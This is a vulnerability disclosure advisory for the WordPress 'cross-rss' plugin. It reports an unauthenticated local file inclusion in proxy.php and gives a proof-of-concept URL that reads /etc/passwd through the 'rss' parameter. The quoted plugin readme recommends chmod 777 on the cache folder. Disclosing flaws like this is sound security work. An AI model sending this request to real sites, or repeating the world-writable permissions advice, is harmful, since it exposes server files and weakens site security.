wp-plugin : cross-rss

Plugin Details
Plugin Name: wp-plugin : cross-rss
Affected Version : 1.7 (and most probably lower versions, if any)
Vulnerability : Local File Inclusion
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC (Proof of Concept) :

http://localhost/wp-content/plugins/cross-rss/proxy.php?rss=/etc/passwd

Vulnerable Parameter : rss

The rss parameter is meant to carry the URL of a remote feed for proxy.php to fetch (see the plugin description below). The PoC shows that an absolute local path is accepted in its place and the file's contents are returned to an unauthenticated caller, so the endpoint is an arbitrary file read for anything the web server user can open.


Disclosure Timeline
Vendor Contacted : 2014-02-19
Plugin Status : Updated on
Public Disclosure : May 29, 2014
CVE Number : CVE-2014-4941
Plugin Description (from the plugin's own readme) :

Installation:
1. Unzip the file and place the folder cross-rss, with all files, in the wp-content/plugins dir.
2. Go to the WordPress Admin Plugins section and activate the Cross-RSS 0.5 plugin.
3. Set chmod 777 on wp-content/plugins/cross-rss/cache (make it writable by webserver scripts).
4. Set chmod 666 on wp-content/plugins/cross-rss/proxy.log (make it writable by webserver scripts).

Usage:
When creating a page or blog post, just place the line:

[crossrss url=http://example.com/file.rss /]

where http://example.com/file.rss is the full URL of the RSS feed you want to view on your WordPress page.